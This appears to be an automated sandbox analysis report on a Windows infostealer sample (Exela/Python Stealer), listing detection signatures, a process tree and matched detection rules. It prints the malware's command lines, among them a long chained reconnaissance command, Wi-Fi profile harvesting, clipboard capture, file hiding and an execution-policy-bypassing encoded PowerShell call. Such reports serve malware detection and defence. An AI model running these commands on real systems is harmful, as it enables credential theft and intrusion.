
Windows Analysis Report
SecuriteInfo.com.FileRepMalware.22561.28030.exe

Overview

General Information

Sample name: SecuriteInfo.com.FileRepMalware.22561.28030.exe
Analysis ID: 1543665
MD5: aecb2c382b2181620aa3243dcbca51c8
SHA1: 9b103aa29dd1f39b7bb6261703f144bfdfa4a06e
SHA256: 6b9568f25dba66dde3d01baa88ff15ce5165fed7c29c8446d8fab993234a49ce
Tags: exe

Detection

Python Stealer, Exela Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Exela Stealer
Yara detected Python Stealer
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Gathers network related connection and port information
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Potentially malicious time measurement code found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Python Stealer
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SecuriteInfo.com.FileRepMalware.22561.28030.exe (PID: 1292 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe" MD5: AECB2C382B2181620AA3243DCBCA51C8)
    • SecuriteInfo.com.FileRepMalware.22561.28030.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe" MD5: AECB2C382B2181620AA3243DCBCA51C8)
      • cmd.exe (PID: 5904 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3212 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6864 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7020 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2876 cmdline: wmic computersystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2132 cmdline: C:\Windows\system32\cmd.exe /c "gdb --version" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6204 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5580 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 3136 cmdline: C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4208 cmdline: wmic path Win32_ComputerSystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3840 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7136 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2580 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 1008 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 5672 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 3184 cmdline: attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 5724 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 3852 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2936 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 1968 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 5800 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2524 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 6104 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 3420 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 2136 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 2144 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4508 cmdline: powershell.exe Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6468 cmdline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 3532 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • WmiPrvSE.exe (PID: 3984 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • HOSTNAME.EXE (PID: 672 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
        • WMIC.exe (PID: 2404 cmdline: wmic logicaldisk get caption,description,providername MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • net.exe (PID: 4140 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 876 cmdline: C:\Windows\system32\net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • query.exe (PID: 3536 cmdline: query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45)
          • quser.exe (PID: 6204 cmdline: "C:\Windows\system32\quser.exe" MD5: 480868AEBA9C04CA04D641D5ED29937B)
        • net.exe (PID: 6184 cmdline: net localgroup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 3248 cmdline: C:\Windows\system32\net1 localgroup MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 4052 cmdline: net localgroup administrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 3048 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 6432 cmdline: net user guest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 1908 cmdline: C:\Windows\system32\net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 5800 cmdline: net user administrator MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 3744 cmdline: C:\Windows\system32\net1 user administrator MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 4208 cmdline: wmic startup get caption,command MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • tasklist.exe (PID: 7148 cmdline: tasklist /svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • ipconfig.exe (PID: 5916 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • ROUTE.EXE (PID: 7020 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
        • ARP.EXE (PID: 5700 cmdline: arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98)
        • NETSTAT.EXE (PID: 6116 cmdline: netstat -ano MD5: 7FDDD6681EA81CE26E64452336F479E6)
        • sc.exe (PID: 5060 cmdline: sc query type= service state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • netsh.exe (PID: 7044 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • netsh.exe (PID: 2876 cmdline: netsh firewall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 5544 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 1408 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 5896 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4884 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5504 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7120 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_ExelaStealer | Yara detected Exela Stealer | Joe Security |
00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_PythonStealer | Yara detected Python Stealer | Joe Security |
00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_ExelaStealer | Yara detected Exela Stealer | Joe Security |
00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_PythonStealer | Yara detected Python Stealer | Joe Security |

            System Summary

            Source: Threat created, Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 4208, StartAddress: B28432B0, TargetImage: C:\Windows\System32\wbem\WMIC.exe, TargetProcessId: 4208
            Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: Process started, Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: Process started, Author: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: cmd.exe /c chcp, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2936, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 1968, ProcessName: chcp.com
            Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe, ParentProcessId: 7112, ParentProcessName: SecuriteInfo.com.FileRepMalware.22561.28030.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ProcessId: 2144, ProcessName: cmd.exe
            Source: Process started, Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: Process started, Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6468, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup administrators, ProcessId: 4052, ProcessName: net.exe
            Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7120, TargetFilename: C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.cmdline
            Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6468, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 4140, ProcessName: net.exe
            Source: Process started, Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6468, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 4140, ProcessName: net.exe
            Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Get-Clipboard, CommandLine: powershell.exe Get-Clipboard, CommandLine|base64offset|contains: ~Xn, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2144, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Get-Clipboard, ProcessId: 4508, ProcessName: powershell.exe
            Source: Process started, Author: frack113: Data: Command: sc query type= service state= all, CommandLine: sc query type= service state= all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6468, ParentProcessName: cmd.exe, ProcessCommandLine: sc query type= service state= all, ProcessId: 5060, ProcessName: sc.exe
            Source: Process started, Author: frack113: Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6468, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 672, ProcessName: HOSTNAME.EXE
            Source: Process started, Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe, ParentProcessId: 7112, ParentProcessName: SecuriteInfo.com.FileRepMalware.22561.28030.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localg

            Stealing of Sensitive Information

            Source: Process started, Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe, ParentProcessId: 7112, ParentProcessName: SecuriteInfo.com.FileRepMalware.22561.28030.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", ProcessId: 5544, ProcessName: cmd.exe
            No Suricata rule has matched


            AV Detection

